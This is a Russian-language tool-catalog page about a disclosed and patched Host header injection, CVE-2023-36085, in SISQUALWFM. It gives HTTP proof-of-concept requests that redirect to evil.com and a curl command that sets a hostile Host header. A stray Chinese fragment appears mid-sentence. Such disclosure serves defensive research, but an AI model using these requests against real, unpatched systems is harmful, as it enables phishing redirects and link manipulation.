Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — Этот репозиторий содержит информацию, связанную с CVE-2023-36085, уязвимостью внедрения заголовка хоста (Host Header Injection), обнаруженной в SISQUALWFM версии 7.1.319.103, которая позволяет злоумышленнику манипулировать ссылками на веб-страницах или перенаправлять пользователей на вредоносный сайт. Этой уязвимости был присвоен идентификатор CVE-2023-36085, и она была исправлена в версии 7.1.319.111 и выше. | Kitploit
Инструменты/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Репозиторий
2 лет назадЕщё не проверено

Этот репозиторий содержит информацию, связанную с CVE-2023-36085, уязвимостью внедрения заголовка хоста (Host Header Injection), обнаруженной в SISQUALWFM версии 7.1.319.103, которая позволяет злоумышленнику манипулировать ссылками на веб-страницах или перенаправлять пользователей на вредоносный сайт. Этой уязвимости был присвоен идентификатор CVE-2023-36085, и она была исправлена в версии 7.1.319.111 и выше.

Поделиться

CVE-2023-36085 Уязвимость внедрения заголовка Host в SISQUALWFM

Этот репозиторий содержит информацию об уязвимости внедрения заголовка Host, обнаруженной в SISQUALWFM версии 7.1.319.103, которая позволяет злоумышленнику манипулировать ссылками на веб-странице или перенаправлять пользователей на вредоносный сайт. Этой уязвимости присвоен идентификатор CVE-2023-36085, и она исправлена в версии 7.1.319.111 и выше.

Сведения об уязвимости

  • Название эксплойта: SISQUALWFM 7.1.319.103 Host Header Injection
  • Дата обнаружения: 17/03/2023
  • Дата сообщения: 17/03/2023
  • Дата устранения: 13/10/2023
  • Автор эксплойта: Omer Shaik (unknown_exploit)
  • Домашняя страница вендора: SISQUALWFM
  • Версия: 7.1.319.103
  • Протестировано на: SISQUAL WFM 7.1.319.103
  • Затронутая версия: SISQUALWFM 7.1.319.103
  • Исправленная версия: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • Оценка CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Категория: Веб-приложения

Доказательство концепции

Мы приводим сценарий доказательства концепции, демонстрирующий уязвимость внедрения заголовка Host, с целевым конечным点在 /sisqualIdentityServer/core. Эта уязвимость позволяет злоумышленнику манипулировать ссылками на веб-странице или перенаправлять пользователей на другой сайт путём изменения заголовка Host.

Исходный запрос

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

Исходный ответ

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

Перехваченный запрос (изменён для перенаправления на evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

Ответ

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Выполнение эксплойта

Метод атаки

Чтобы воспользоваться этой уязвимостью, злоумышленник может использовать следующую команду curl для изменения заголовка Host:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

Отказ от ответственности

Этот репозиторий предназначен только для информационных целей и не должен использоваться для каких-либо вредоносных действий. Уязвимость была ответственно раскрыта вендору, и проблема устранена. Крайне важно следовать этическим принципам взлома и соблюдать практики ответственного раскрытия при выявлении и сообщении об уязвимостях.

Скачать инструмент